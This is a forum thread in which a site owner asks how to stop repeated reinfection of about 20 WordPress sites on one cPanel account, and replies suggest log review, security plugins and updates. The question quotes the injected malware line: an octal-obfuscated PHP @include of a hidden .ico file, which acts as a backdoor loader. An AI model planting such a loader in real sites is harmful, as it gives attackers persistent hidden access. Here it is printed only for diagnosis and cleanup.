# Multiple Wordpress Websites Keeps Getting Hacked on a Same Hosting

Tags: wordpress, cpanel, virus, ico

Here is the problem. I'm hosting about 20 Wordpress websites in 1 hosting. While I'm cleaning one website from viruses (.ico file injecting code into index.php) the other already cleaned websites are being injected again (in the matter of hours or days).

The solution to make a backup of all the sql bases and delete all the files - will not work for me - because in some of the websites are my small custom scripts ( nothing much, just small changed in html, pretty sure I didn't create a vulnerability by mistake any)

So my questions are:

1. Is it possible to seperate home directories in cPanel so every website will be seperated from each other?
2. if no, changing the permissions in file manager to for example 544 will stop from editing the files?
3. Any other solutions on how to remove forever this hack and all the backdoors?

Because right now the only solution I see is to download 1 website, remove all the files, just leave the wp-content and theme folder, install a new wordpress on a new hosting and leave it there. But still it's going to be a bit expensive to buy 20 different hosting account.

Would be very gratefull for any ideas!

P.S. The example of the injected code in index.php

```
/*73c7c*/

@include "\057h\157m\145/\164i\156y\164o\162r\057s\141m\160l\145s\162.\165s\057w\160-\143o\156t\145n\164/\1673\164c\055c\157n\146i\147/\0568\062d\1441\1468\145.\151c\157";

/*73c7c*/
```

Answer (score 0):

You should check the logs and see what type of vulnerability is the attacker exploiting. If you just clean, reinstall wordpress and so on, those websites will always be hacked. You have to find the vulnerability and do something to patch it so it won't be hacked again. You really can't separate the websites since you have them in the same cPanel account so as long as they belong to the exact same user it makes no difference in which folder they are or if they have different folders.

I would install a security wordpress plugin like Sucuri, Wordfence or BulletProof Security. These plugins improve the security of your wordpress, add some tweaks and some extra security settings in order to prevent such type of attacks. They also have Audit tools and logging so you might have a better picture what exactly the vulnerability is and possibly how to patch it.

I would go with BPS for the start and see how it plays. It adds quite a lot of rules to your .htaccess file, rules that will improve your wordpress website security and protect against different sorts of attacks, xss/css injection etc.

Wordpress is a great CMS but because it is so widely used, it's probably one of the most target platforms by bots, crawlers, scanners, hackers etc. Usually, Wordpress gets hacked or compromised because a theme or a plugin, incorrect file permissions.

Comment: In addition to this answer, I would also advice the OP to upgrade WordPress core, themes and plugins to the latest version available on all 20 sites to prevent the use of known exploits that have been already patched up by the WordPress community.

Comment: Thank you for a such informative reply. That's what I'm doing now, updated everything in bulk and deleting those infected ico files. All my websites have Wordfence and it informing me everytime the website is being hacked. Found the way to read the logs, apparently hacker using wp-cron.php to run somekind of function. But i'm not sure. Anyways thanks a lot for your answer!

Comment: No problem... Just be sure that you are running the latest wordpress version. I would recommend, at least for a wordpress that you know for sure that's infected, install this wordpress plugin: https://wordpress.org/plugins/gotmls/... Generate a new API key, update it and run a full scan. It's possbile that some other infected files are already there and you have no clue about them so you're not deleting them all... Just give it a try and see if you've missed any infected or compromised files. You could also mark the answer if you consider it's helpful. Thanks